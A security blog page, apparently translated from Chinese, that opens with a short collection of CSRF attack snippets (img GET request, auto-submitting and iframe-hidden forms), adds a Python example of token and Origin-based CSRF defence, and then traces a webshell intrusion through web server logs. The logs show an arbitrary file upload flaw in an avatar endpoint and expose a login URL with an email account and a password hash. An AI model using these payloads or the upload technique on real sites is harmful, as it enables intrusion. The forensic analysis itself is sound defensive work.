CSRF exploit code round-up

GET-based:

<img src="http://0535code.com/index.php?action=add" />

POST-based:

<!-- JS version: auto-submit the first form on the page -->
<form method="post" action="http://0535code.com/">
<input type="text" name="data" value="11" />
</form>
<script> document.forms[0].submit(); </script>
<!-- Version 1: look the form up by id and submit it -->
<form id="myfrom" name="myfrom" method="post" action="http://0535code.com/">
<input type="hidden" name="data" value="csrf1">
</form>
<script>
var myfrom = document.getElementById("myfrom");
myfrom.submit();
</script>
<!-- Version 2: look the form up by id and submit it, hiding the response page in a 0x0 iframe -->
<iframe frameborder="0" name="myiframe" width="0px" height="0px"></iframe>
<form id="myfrom" method="post" target="myiframe" action="http://0535code.com/">
<input type="hidden" name="data" value="csrf2">
</form>
<script>
var myfrom = document.getElementById('myfrom');
myfrom.submit();
</script>
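The server-side counterpart, as an added example that is not part of the original post: it models the requests the three snippets above produce (a GET from an img tag, an auto-submitted cross-site form, the same form hidden in an iframe) and shows why a synchronizer token plus an Origin/Referer check rejects all of them while a same-site submission passes. The attacker hostname and header values are constructed.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://0535code.com"   # the target origin used in the snippets above


def issue_token(session):
    """Bind a fresh random token to the user's session (synchronizer-token pattern)."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def origin_allowed(headers):
    """True only if Origin (or, failing that, Referer) names our own site.
    A cross-site <img> or auto-submitted form carries the attacker's origin or none,
    so a missing header is a failure, not a pass."""
    origin = headers.get("Origin")
    if origin is None:
        ref = headers.get("Referer")
        if ref is None:
            return False
        parts = urlsplit(ref)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def csrf_check(method, headers, form, session):
    """Return (allowed, reason) for a state-changing request.
    Rules: state changes never ride on GET (defeats the <img> vector); a POST must
    carry the session's token, compared in constant time (defeats the forged forms,
    iframe or not, since the attacker cannot read the token); and the origin must be ours."""
    if method.upper() != "POST":
        return False, "state-changing request must use POST"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or mismatched CSRF token"
    if not origin_allowed(headers):
        return False, "cross-site origin"
    return True, "ok"


def demo():
    """Constructed requests modelling the page's vectors; returns {case: allowed}."""
    session = {}
    token = issue_token(session)
    attacker = {"Origin": "http://attacker.example"}        # constructed attacker origin
    cases = {
        # <img src=".../index.php?action=add">: GET, no token, attacker Referer only
        "img_get": csrf_check("GET", {"Referer": "http://attacker.example/"}, {"action": "add"}, session),
        # auto-submitted <form method="post">: the browser sends the attacker's Origin, no token
        "form_post": csrf_check("POST", attacker, {"data": "csrf1"}, session),
        # the iframe variant is identical on the wire, so it gets the identical verdict
        "iframe_post": csrf_check("POST", attacker, {"data": "csrf2"}, session),
        # a guessed token is rejected before the origin is even looked at
        "forged_token": csrf_check("POST", {"Origin": SITE_ORIGIN}, {"csrf_token": "x" * 43}, session),
        # a legitimate same-site submission carrying the session token
        "legit": csrf_check("POST", {"Origin": SITE_ORIGIN}, {"data": "11", "csrf_token": token}, session),
    }
    return {name: verdict[0] for name, verdict in cases.items()}


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name:13s} -> {'allowed' if allowed else 'rejected'}")
```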

Tracing an intrusion back through web logs (a reverse penetration analysis)

A customer's site was found to contain a backdoor at /home/wwwroot/default/Public/Uploadify/demo.php. demo.php is a typical one-line webshell. How was it uploaded to the site? There are many possible causes. It could have been a system vulnerability followed by privilege escalation, but in that case the attacker would simply have used a rootkit and had no need to leave a one-line backdoor, so that idea was ruled out first. The other possibility is a web vulnerability such as a weak password or an upload flaw, which is by far the most likely. Finding the flaw through a penetration test would cost a great deal of time and effort; the alternative is reverse penetration, working backwards from the logs. In theory that always finds the cause, but in practice it often does not, or the trail is very complicated and has to be pieced together indirectly. This time I chose to work backwards to find how the webshell was written.

I downloaded the last 30 days of access.log. The webshell's timestamp can only serve as a hint, since a webshell's mtime can be changed, so it must not be taken as authoritative. I started with the last week of logs and found nothing; only with the last month of logs did the trail appear.

// Searching the log for demo.php gives 35 entries, all containing demo.php

138.128.212.179 – – [16/Jul/2016:00:23:00 +0800] “GET /Public/js/demo.php HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

// This shows the actual webshell path was not this one; move on to the next demo.php request

138.128.212.179 – – [16/Jul/2016:00:21:06 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 404 1331 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0″

// Found it. This entry is the attacker requesting the webshell, but it returned 404, so the file did not exist at that moment; the attacker was probably testing whether the webshell had been written successfully.

// Search again for 'demo.php HTTP/1.1" 200', which matches the period before the webshell was deleted: 21 hits. Now follow the attacker's trail by IP (IP: 138.128.212.179)
138.128.212.179 - - [12/Jul/2016:19:02:18 +0800] "GET /Public/uploadify.php HTTP/1.1" 404 791 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0" // /Public/uploadify.php does not exist: 404
138.128.212.179 - - [12/Jul/2016:19:02:22 +0800] "GET /Public/uploadf.php HTTP/1.1" 200 13 "-" "Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0" // /Public/uploadf.php exists: 200
138.128.212.179 – – [12/Jul/2016:19:02:26 +0800] “GET /Public/ HTTP/1.1” 403 273 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:31 +0800] “GET /Uploads/ HTTP/1.1” 403 274 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:36 +0800] “GET /Uploads/Pic/ HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:39 +0800] “GET /Uploads/ HTTP/1.1” 403 274 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:41 +0800] “GET / HTTP/1.1” 302 3 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:41 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:42 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

// It looks like the upload script /Public/uploadify.php was found here; the attacker is looking for the upload directory;

138.128.212.179 – – [14/Jul/2016:18:41:14 +0800] “GET / HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:16 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:16 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:18 +0800] “GET / HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:19 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:21 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:21 +0800] “GET /1.log HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:23 +0800] “GET /public/upimg.htm?and+1=1+and+”=’ HTTP/1.1″ 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:23 +0800] “GET /public/upimg.htm HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:24 +0800] “GET /Public/upimg.htm HTTP/1.1” 200 744 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:24 +0800] “GET /public/uploadify.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:25 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:28 +0800] “GET /Public/uploadify.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:28 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:31 +0800] “GET /ajax.php HTTP/1.1” 200 54 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:32 +0800] “GET /Home/Login/loginadmin HTTP/1.1” 200 948 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:32 +0800] “GET /phpMyAdmin/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:34 +0800] “GET /pm/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:35 +0800] “GET /phpinfo.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:35 +0800] “GET /Bak_data/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:36 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:36 +0800] “GET /Public/UEditor/ueditor.all.js HTTP/1.1” 404 162 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:36 +0800] “GET /Data/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:37 +0800] “GET /db/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:37 +0800] “GET /Db/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:38 +0800] “GET /iProber.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:38 +0800] “GET /Public/3mz.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:39 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:39 +0800] “GET /Public/main1.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:40 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”

// The log above is the attacker scanning with a Python script; it did not turn up any sensitive information

138.128.212.179 – – [14/Jul/2016:18:52:21 +0800] “GET /User/Runtime/Logs/Home/16_07_14.log HTTP/1.1” 200 535770 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

// This entry is useful. When ThinkPHP has debug mode enabled and logs to file, it creates log files under this directory by default, named year_month_day. Anyone can download them, and here the attacker already has. I downloaded one and looked: it is an error log.

138.128.212.179 – – [14/Jul/2016:18:52:50 +0800] “GET /User/Runtime/Logs/Home/16_07_13.log HTTP/1.1” 200 429903 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:52:58 +0800] “GET /User/Runtime/Logs/Home/16_07_12.log HTTP/1.1” 200 27181 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:53:05 +0800] “GET /User/Runtime/Logs/Home/16_07_11.log HTTP/1.1” 200 452102 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:53:20 +0800] “GET /User/Runtime/Logs/Home/16_07_10.log HTTP/1.1” 200 431381 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:54:56 +0800] “GET /User/Runtime/Logs/Home/16_07_09.log HTTP/1.1” 200 433395 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:16 +0800] “GET /User/Runtime/Logs/Home/16_07_08.log HTTP/1.1” 200 462788 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:23 +0800] “GET /User/Runtime/Logs/Home/16_07_07.log HTTP/1.1” 200 433154 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:27 +0800] “GET /User/Runtime/Logs/Home/16_07_06.log HTTP/1.1” 200 441394 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:30 +0800] “GET /User/Runtime/Logs/Home/16_07_05.log HTTP/1.1” 200 459486 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:46 +0800] “GET /User/Runtime/Logs/Home/16_07_04.log HTTP/1.1” 200 664894 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:57:04 +0800] “GET /User/Runtime/Logs/Home/16_07_03.log HTTP/1.1” 200 1438415 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:04 +0800] “GET /User/Runtime/Logs/Home/16_07_02.log HTTP/1.1” 200 1966718 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:31 +0800] “GET /User/Runtime/Logs/Home/16_07_01.log HTTP/1.1” 200 428610 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:36 +0800] “GET /User/Runtime/Logs/Home/16_06_30.log HTTP/1.1” 200 522384 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:37 +0800] “GET /User/Runtime/Logs/Home/16_06_29.log HTTP/1.1” 200 77195 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:38 +0800] “GET /User/Runtime/Logs/Home/16_06_28.log HTTP/1.1” 404 1331 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:38 +0800] “GET /User/Runtime/Logs/Home/16_06_27.log HTTP/1.1” 404 1331 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:39 +0800] “GET /User/Runtime/Logs/Home/16_06_26.log HTTP/1.1” 404 1331 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:39 +0800] “GET /User/Runtime/Logs/Home/16_06_25.log HTTP/1.1” 404 1331 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [15/Jul/2016:01:02:53 +0800] “GET / HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:54 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:55 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:55 +0800] “GET / HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:55 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:56 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:56 +0800] “GET /1.log HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:57 +0800] “GET /public/upimg.htm?and+1=1+and+”=’ HTTP/1.1″ 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:57 +0800] “GET /public/upimg.htm HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:58 +0800] “GET /Public/upimg.htm HTTP/1.1” 200 744 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:58 +0800] “GET /public/uploadify.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:58 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:59 +0800] “GET /Public/uploadify.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:59 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:00 +0800] “GET /ajax.php HTTP/1.1” 200 54 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:00 +0800] “GET /Home/Login/loginadmin HTTP/1.1” 200 948 “-” “python-requests/2.10.0”
223.104.91.228 – – [15/Jul/2016:01:03:00 +0800] “POST /Home/Index/tgbzcl HTTP/1.1” 200 86 “http://www.slbvip.com/Home/Index/home1” “Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/13F69 UCBrowser/10.9.15.793 Mobile”
138.128.212.179 – – [15/Jul/2016:01:03:01 +0800] “GET /phpMyAdmin/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:01 +0800] “GET /pm/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:02 +0800] “GET /phpinfo.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:02 +0800] “GET /Bak_data/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
// Everything up to here is the Python script scanning; it only turned up the error logs, nothing else of use;

138.128.212.179 – – [15/Jul/2016:17:21:34 +0800] “GET /favicon.ico HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [15/Jul/2016:17:21:55 +0800] “POST /Home/Common/uploadFace HTTP/1.1″ 200 59 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [15/Jul/2016:17:22:25 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 51 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:25 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 119 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:27 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 115 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:33 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 1526 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:36 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 112 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:45 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 1037 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:00 +0800] “GET /Public/uploadifiy.php HTTP/1.1” 200 0 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [15/Jul/2016:17:23:21 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 748 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:25 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 420 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:26 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 250 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:34 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:35 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 290 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:41 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:48 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:49 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 785 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

// From the above, the /Home/Common/uploadFace method has an arbitrary file upload vulnerability; this is where the attacker uploaded the file. Every POST to it returns 200, whereas a file that does not exist should return 404;

138.128.212.179 – – [15/Jul/2016:17:24:36 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 119 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:40 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:43 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:45 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:45 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 112 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:51 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 110 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:53 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 13 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:59 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 254 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

// The attacker successfully uploaded the demo.php backdoor webshell. The earlier uploads did not specify an upload directory; this one went to a chosen directory, so the upload function's parameters evidently include the upload path and file name;

138.128.212.179 – – [16/Jul/2016:00:14:31 +0800] “GET /Public/Uploadify/demo.php HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:31 +0800] “GET /favicon.ico HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:43 +0800] “GET /Public/Ueditor/php/upload.php HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:44 +0800] “GET /Public/Ueditor/php/ HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:46 +0800] “GET /Public/Ueditor/ HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:47 +0800] “GET /Public/ HTTP/1.1” 403 273 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

// What the attacker did with the backdoor in between is unknown. /Public/Ueditor/php/upload.php was also requested here and returned 404; either the customer deleted it, or protection software stopped the attacker's upload.

138.128.212.179 – – [16/Jul/2016:00:15:28 +0800] “GET /Home/Login/loginadmin/account/819432780@qq.com/password/e61d6ad4e829e87c9c3791d161f8522c HTTP/1.1” 302 3 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

// This record shows the attacker logged in with this account. The account should be deleted from the back end and the IP banned; you could also add the attacker's QQ and have a chat.

138.128.212.179 – – [16/Jul/2016:00:16:04 +0800] “POST /Home/Common/uploadFace HTTP/1.1” 200 59 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

// The attacker's webshell above had been deleted, so they came back to upload again

138.128.212.179 – – [16/Jul/2016:00:16:33 +0800] “POST /Uploads/Pic/2016-07-16/57890c445c548.php HTTP/1.1” 200 32 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

// Webshell uploaded successfully

138.128.212.179 – – [16/Jul/2016:00:16:43 +0800] “GET /Uploads/Pic/2016-07-16/57890c445c548.php HTTP/1.1” 200 32 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

// The attacker starts accessing it. Apparently something went wrong? It could not be accessed normally?

138.128.212.179 – – [16/Jul/2016:00:17:02 +0800] “POST /Home/Common/uploadFace HTTP/1.1” 200 60 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:17:11 +0800] “POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1” 405 166 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [16/Jul/2016:00:17:21 +0800] “GET /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1” 200 32 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

// Another file was uploaded, this time with a .vbak extension; the previous one was probably killed, this one returns 405, so this looks like an attempt to get around the protection.

138.128.212.179 – – [16/Jul/2016:00:17:46 +0800] “POST /Home/Common/uploadFace HTTP/1.1” 200 57 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
